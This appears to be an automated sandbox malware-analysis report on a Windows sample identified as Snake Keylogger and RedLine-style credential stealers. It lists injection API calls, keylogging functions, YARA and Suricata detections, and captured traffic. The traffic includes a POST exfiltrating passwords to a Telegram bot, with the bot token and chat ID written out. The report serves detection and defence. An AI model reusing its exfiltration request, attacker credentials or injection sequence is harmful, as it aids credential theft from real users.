Source:	Binary string: _.pdb source: daphpvwO.pif, 00000005.00000002.3833108807.00000000298E1000.00000004.00000800.00020000.00000000.sdmp, daphpvwO.pif, 00000005.00000002.3832357207.0000000028880000.00000004.08000000.00040000.00000000.sdmp, daphpvwO.pif, 00000005.00000002.3832140039.00000000285C0000.00000004.00000020.00020000.00000000.sdmp, daphpvwO.pif, 00000005.00000003.1325957813.00000000268F6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbGCTL source: ja811MqV4h.exe, 00000000.00000002.1359167957.00000000206D9000.00000004.00001000.00020000.00000000.sdmp, ja811MqV4h.exe, 00000000.00000002.1359167957.00000000206B0000.00000004.00001000.00020000.00000000.sdmp, ja811MqV4h.exe, 00000000.00000003.1318791565.0000000000996000.00000004.00000020.00020000.00000000.sdmp, ja811MqV4h.exe, 00000000.00000003.1317716595.000000007F320000.00000004.00001000.00020000.00000000.sdmp, ja811MqV4h.exe, 00000000.00000003.1318791565.00000000009C7000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\ja811MqV4h.exe

Code function: 0_2_029C52F8 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

0_2_029C52F8

Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	5_2_2842DE70
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2B5C41B9h	5_2_2B5C3F08
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2B5C490Fh	5_2_2B5C44F0
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2B5CF4B1h	5_2_2B5CF208
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2B5CFD61h	5_2_2B5CFAB8
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2B5CEC01h	5_2_2B5CE958
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2B5C490Fh	5_2_2B5C483C
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2B5CF909h	5_2_2B5CF660
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2B5CF059h	5_2_2B5CEDB0
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2C14037Dh	5_2_2C140040
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2C14E420h	5_2_2C14E178
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then mov ecx, 000003E8h	5_2_2C14F760
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2C14D2C0h	5_2_2C14D018
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2C14AEC8h	5_2_2C14AC20
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2C14D718h	5_2_2C14D470
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2C14B320h	5_2_2C14B078
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2C14B778h	5_2_2C14B4D0
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2C14DB70h	5_2_2C14D8C8
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2C14DFC8h	5_2_2C14DD20
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2C14BBD0h	5_2_2C14B928
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2C148C08h	5_2_2C148960
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2C14C028h	5_2_2C14BD80
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2C149060h	5_2_2C148DB8
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2C14E878h	5_2_2C14E5D0
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2C14C482h	5_2_2C14C1D8
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2C1494B8h	5_2_2C149210
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2C140EC2h	5_2_2C140E10
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2C140EC2h	5_2_2C140E18
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2C1418E0h	5_2_2C141638
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2C14ECD0h	5_2_2C14EA28
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2C149910h	5_2_2C149668
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2C141D38h	5_2_2C141A90
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2C14F128h	5_2_2C14EE80
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2C149D68h	5_2_2C149AC0
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2C142190h	5_2_2C141EE8
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2C14A1C0h	5_2_2C149F18
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then mov ecx, 000003E8h	5_2_2C14F75E
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2C1425E8h	5_2_2C142340
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2C14A618h	5_2_2C14A370
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2C14CA10h	5_2_2C14C768
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2C142A40h	5_2_2C142798
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2C14CE68h	5_2_2C14CBC0
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2C14AA70h	5_2_2C14A7C8
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2C142E98h	5_2_2C142BF0
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2C1D0D0Dh	5_2_2C1D0B30
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then jmp 2C1D1697h	5_2_2C1D0B30
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then push 00000000h	5_2_2C1D4040
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then mov ecx, dword ptr [ebp-40h]	5_2_2C1DF7B0
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	5_2_2C1D4E4E
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	5_2_2C1D0853
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then push 00000000h	5_2_2C1D4B96
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	5_2_2C1D0673
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	5_2_2C1DE6C8
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	5_2_2C1DE6C1
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	5_2_2C1D0040
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then mov ecx, dword ptr [ebp-40h]	5_2_2C1DF7AC
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then push 00000000h	5_2_2CBAC658
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then lea esp, dword ptr [ebp-08h]	5_2_2CBAC658
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 4x nop then push 00000000h	5_2_2CBAD1AF

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49711 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49711 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7944799152:AAGEIoBASD2qU30MwhTZbPlH5kb-mmGcJTU/sendDocument?chat_id=403948698&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd604fc058aa8cHost: api.telegram.orgContent-Length: 1088Connection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.21.32.1 104.21.32.1
Source: Joe Sandbox View	IP Address: 104.21.32.1 104.21.32.1
Source: Joe Sandbox View	IP Address: 193.122.130.0 193.122.130.0

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic

Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49708 -> 193.122.130.0:80

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: unknown

HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49709 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot7944799152:AAGEIoBASD2qU30MwhTZbPlH5kb-mmGcJTU/sendDocument?chat_id=403948698&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd604fc058aa8cHost: api.telegram.orgContent-Length: 1088Connection: Keep-Alive

Source: daphpvwO.pif, 00000005.00000002.3832462601.00000000288E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: daphpvwO.pif, 00000005.00000002.3833108807.00000000298E1000.00000004.00000800.00020000.00000000.sdmp, daphpvwO.pif, 00000005.00000002.3832357207.0000000028880000.00000004.08000000.00040000.00000000.sdmp, daphpvwO.pif, 00000005.00000002.3832140039.00000000285C0000.00000004.00000020.00020000.00000000.sdmp, daphpvwO.pif, 00000005.00000002.3833360482.000000002AEC0000.00000004.08000000.00040000.00000000.sdmp, daphpvwO.pif, 00000005.00000003.1325957813.00000000268F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: daphpvwO.pif, 00000005.00000002.3832462601.00000000288E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: ja811MqV4h.exe, 00000000.00000003.1317716595.000000007F366000.00000004.00001000.00020000.00000000.sdmp, ja811MqV4h.exe, 00000000.00000003.1318064096.000000007F210000.00000004.00001000.00020000.00000000.sdmp, ja811MqV4h.exe, 00000000.00000002.1359167957.00000000206D9000.00000004.00001000.00020000.00000000.sdmp, ja811MqV4h.exe, 00000000.00000002.1359167957.00000000206B0000.00000004.00001000.00020000.00000000.sdmp, ja811MqV4h.exe, 00000000.00000002.1325858456.0000000000994000.00000004.00000020.00020000.00000000.sdmp, ja811MqV4h.exe, 00000000.00000003.1318064096.000000007F256000.00000004.00001000.00020000.00000000.sdmp, ja811MqV4h.exe, 00000000.00000002.1359987570.0000000020F60000.00000004.00000020.00020000.00000000.sdmp, daphpvwO.pif, 00000005.00000000.1320952720.0000000000416000.00000002.00000001.01000000.00000005.sdmp, daphpvwO.pif.0.dr	String found in binary or memory: http://www.pmail.com
Source: daphpvwO.pif, 00000005.00000002.3832462601.0000000028925000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: daphpvwO.pif, 00000005.00000002.3833108807.00000000298E1000.00000004.00000800.00020000.00000000.sdmp, daphpvwO.pif, 00000005.00000002.3832357207.0000000028880000.00000004.08000000.00040000.00000000.sdmp, daphpvwO.pif, 00000005.00000002.3832140039.00000000285C0000.00000004.00000020.00020000.00000000.sdmp, daphpvwO.pif, 00000005.00000002.3833360482.000000002AEC0000.00000004.08000000.00040000.00000000.sdmp, daphpvwO.pif, 00000005.00000003.1325957813.00000000268F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
Source: daphpvwO.pif, 00000005.00000002.3830052726.00000000268E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/
Source: daphpvwO.pif, 00000005.00000002.3833108807.00000000298E1000.00000004.00000800.00020000.00000000.sdmp, daphpvwO.pif, 00000005.00000002.3832357207.0000000028880000.00000004.08000000.00040000.00000000.sdmp, daphpvwO.pif, 00000005.00000002.3832140039.00000000285C0000.00000004.00000020.00020000.00000000.sdmp, daphpvwO.pif, 00000005.00000002.3833360482.000000002AEC0000.00000004.08000000.00040000.00000000.sdmp, daphpvwO.pif, 00000005.00000003.1325957813.00000000268F6000.00000004.00000020.00020000.00000000.sdmp, daphpvwO.pif, 00000005.00000002.3832462601.0000000028911000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49711 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 5.2.daphpvwO.pif.2aec0000.9.raw.unpack, UltraSpeed.cs

.Net Code: VKCodeToUnicode

System Summary

Malicious sample detected (through community Yara rule)

Source: 5.1.daphpvwO.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 5.2.daphpvwO.pif.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 5.2.daphpvwO.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 5.1.daphpvwO.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 5.3.daphpvwO.pif.268f6d60.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.3.daphpvwO.pif.268f6d60.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.daphpvwO.pif.2aec0000.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.daphpvwO.pif.2aec0000.9.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.1.daphpvwO.pif.438038.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 5.2.daphpvwO.pif.438038.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.ja811MqV4h.exe.212705a8.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 5.2.daphpvwO.pif.2990e990.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.daphpvwO.pif.2990e990.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.daphpvwO.pif.298e6458.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.daphpvwO.pif.298e6458.7.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.daphpvwO.pif.28880ee8.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.daphpvwO.pif.28880ee8.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.daphpvwO.pif.2aec0000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.daphpvwO.pif.2aec0000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.daphpvwO.pif.298e5570.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.daphpvwO.pif.298e5570.8.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.daphpvwO.pif.28600ca6.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.daphpvwO.pif.28600ca6.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.daphpvwO.pif.28880ee8.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.daphpvwO.pif.28880ee8.5.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.3.daphpvwO.pif.268f6d60.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.3.daphpvwO.pif.268f6d60.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.daphpvwO.pif.28880000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.daphpvwO.pif.28880000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.daphpvwO.pif.2990e990.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.daphpvwO.pif.2990e990.6.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.daphpvwO.pif.28601b8e.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.daphpvwO.pif.28601b8e.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.daphpvwO.pif.298e5570.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.daphpvwO.pif.298e5570.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.daphpvwO.pif.28880000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.daphpvwO.pif.28880000.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.daphpvwO.pif.28600ca6.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.daphpvwO.pif.28600ca6.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.daphpvwO.pif.298e6458.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.daphpvwO.pif.298e6458.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.ja811MqV4h.exe.210c6e48.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 5.2.daphpvwO.pif.28601b8e.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.daphpvwO.pif.28601b8e.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000005.00000001.1321974377.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000005.00000002.3832357207.0000000028880000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000005.00000002.3832357207.0000000028880000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000005.00000002.3833108807.00000000298E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000005.00000002.3833360482.000000002AEC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000005.00000002.3833360482.000000002AEC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000005.00000003.1325957813.00000000268F6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000005.00000002.3812458119.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000005.00000002.3832140039.00000000285C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: daphpvwO.pif PID: 8816, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Source: C:\Users\user\Links\daphpvwO.pif

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\ja811MqV4h.exe	Code function: 0_2_029D421C GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	0_2_029D421C
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Code function: 0_2_029D3380 NtWriteVirtualMemory,	0_2_029D3380
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Code function: 0_2_029D3034 NtAllocateVirtualMemory,	0_2_029D3034
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Code function: 0_2_029D9654 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	0_2_029D9654
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Code function: 0_2_029D9738 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,	0_2_029D9738
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Code function: 0_2_029D95CC RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	0_2_029D95CC
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Code function: 0_2_029D3B44 NtUnmapViewOfSection,	0_2_029D3B44
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Code function: 0_2_029D38D4 NtReadVirtualMemory,	0_2_029D38D4
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Code function: 0_2_029D421A GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	0_2_029D421A
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Code function: 0_2_029D3032 NtAllocateVirtualMemory,	0_2_029D3032
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Code function: 0_2_029D9578 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	0_2_029D9578

Source: C:\Users\user\Desktop\ja811MqV4h.exe

Code function: 0_2_029DA634 InetIsOffline,Sleep,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess,

0_2_029DA634

Source: C:\Users\user\Desktop\ja811MqV4h.exe	Code function: 0_2_029C20B4	0_2_029C20B4
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_00408C60	5_2_00408C60
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_0040DC11	5_2_0040DC11
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_00407C3F	5_2_00407C3F
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_00418CCC	5_2_00418CCC
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_00406CA0	5_2_00406CA0
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_004028B0	5_2_004028B0
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_0041A4BE	5_2_0041A4BE
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_00418244	5_2_00418244
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_00401650	5_2_00401650
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_00402F20	5_2_00402F20
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_004193C4	5_2_004193C4
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_00418788	5_2_00418788
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_00402F89	5_2_00402F89
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_00402B90	5_2_00402B90
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_004073A0	5_2_004073A0
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_28421448	5_2_28421448
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_28421438	5_2_28421438
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_28421198	5_2_28421198
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_284211A8	5_2_284211A8
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2B5C6BF0	5_2_2B5C6BF0
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2B5CB110	5_2_2B5CB110
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2B5C3F08	5_2_2B5C3F08
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2B5CB7E0	5_2_2B5CB7E0
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2B5C6BE0	5_2_2B5C6BE0
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2B5CF208	5_2_2B5CF208
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2B5CFAB8	5_2_2B5CFAB8
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2B5CFAA8	5_2_2B5CFAA8
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2B5CE958	5_2_2B5CE958
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2B5CE954	5_2_2B5CE954
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2B5CF1FA	5_2_2B5CF1FA
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2B5CA759	5_2_2B5CA759
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2B5CA768	5_2_2B5CA768
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2B5C1F29	5_2_2B5C1F29
